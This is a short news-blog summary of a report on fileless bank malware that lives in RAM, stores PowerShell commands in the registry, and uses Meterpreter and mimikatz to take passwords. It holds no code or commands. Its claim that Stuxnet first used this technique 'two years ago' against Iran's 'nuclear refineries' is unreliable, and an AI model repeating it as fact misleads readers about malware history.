ArsTechnica reported today on a new rash of bank-targeting malware infections which, unlike your average malware, are unique in that they store almost nothing on infected users’ disk drives, instead existing solely in a computer’s RAM. (What they do store in memory is relegated to small powershell commands in the Windows registry.) As a result, they are tremendously difficult to detect, and may have been operating undetected for months already.
In total, “140 unnamed organizations” in 40 countries have known infections, with organizations in “the US, France, Ecuador, Kenya, and the UK” being most frequently targeted.
Notably, the first time we saw malware using this technique was two years ago in connection with the state-sponsored Stuxnet wielded against Iran’s nuclear refineries. Today, it’s installed on a machine using Meterpreter, with mimikatz following up to search the computer for any in-memory passwords. It also, it would seem, was used to steal money from the bank’s ATMs, though the mechanics used here are as-yet unrevealed, as are the ways the malware spreads from computer-to-computer. Indeed, as difficult as this malware is to detect, it’s likely there are many more computers infected than we know about.